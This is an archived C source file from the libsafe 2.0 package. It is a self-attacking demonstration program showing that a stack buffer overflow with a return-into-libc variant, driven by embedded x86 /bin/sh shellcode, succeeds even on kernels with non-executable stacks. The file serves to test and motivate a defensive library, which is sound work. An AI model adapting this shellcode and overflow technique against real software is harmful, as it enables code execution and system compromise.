"Fossies" - the Fresh Open Source Software Archive

Member "libsafe-2.0-16/exploits/exploit-non-exec-stack.c" (12 Jun 2002, 1728 Bytes) of package /linux/misc/old/libsafe-2.0-16.tgz:

As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style: standard) with prefixed line numbers and code folding option. Alternatively you can here view or download the uninterpreted source code file. 
    1 /*
    2  * $Name: release2_0-16 $
    3  * $Id: exploit-non-exec-stack.c,v 1.6 2002/06/12 20:30:37 ttsai Exp $
    4  */
    5 
    6 
    7 /*     This sample program demonstrates that even the kernels with
    8  *     non-executable stacks are vulnerable to buffer overflow attacks.  This
    9  *     is a derived code from comments by Rafal Wojtczuk (see reference number
   10  *     25) and Linus Torvalds (see reference numbers 23) in the Libsafe white
   11  *     paper.
   12  */
   13 
   14 #include <stdio.h>
   15 #include <string.h>
   16 #include <stdlib.h>
   17 
   18 #define STRCPY &strcpy
   19 #define SIZE 512
   20 #define readRegister(var,reg) __asm__ __volatile__("movl %%" #reg ", %0": "=r" (var))
   21 
   22 char shellcode[] =
   23     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   24     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   25     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   26 
   27 char pattern[SIZE];
   28 char buf[SIZE];
   29 
   30 int main(int ac, char *av[])
   31 {
   32     char a[10];
   33     int fp, offset;
   34 
   35     /*
   36      * read the contents of the frame pointer into variable 'fp'.
   37      */
   38     readRegister(fp, ebp);
   39     offset = fp - (int) a + 4;
   40 
   41     memset(pattern, '\xff', SIZE);
   42     *(int *) (pattern + offset) = (int) STRCPY;
   43     *(int *) (pattern + offset + 4) = (int) &buf;
   44     *(int *) (pattern + offset + 8) = (int) &buf;
   45     *(int *) (pattern + offset + 12) = (int) &shellcode;
   46     pattern[offset + 16] = '\0';
   47 
   48     printf("This program demonstrates how a (stack) buffer overflow\n");
   49     printf("can attack linux kernels with *non-executable* stacks.\n");
   50     printf("This is variation on return-int-libc attack.\n");
   51     printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
   52     printf("Press any key to continue...");
   53     getchar();
   54 
   55     memcpy(a, pattern, offset+16);
   56 
   57     return 0;
   58 }